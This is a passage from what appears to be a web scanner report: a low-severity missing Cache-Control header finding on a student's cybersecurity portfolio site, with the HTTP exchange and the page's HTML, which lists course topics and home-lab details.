          </body>
          </html>
          
          Parameter
          Cache-Control
          Solution

          Whenever possible ensure the cache-control HTTP header is set with no-cache, no-store, must-revalidate.

        2. GET https://beekmans.dev/
          Alert tags
          Alert description

          The cache-control header has not been set properly or is missing, allowing the browser and proxies to cache content.

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
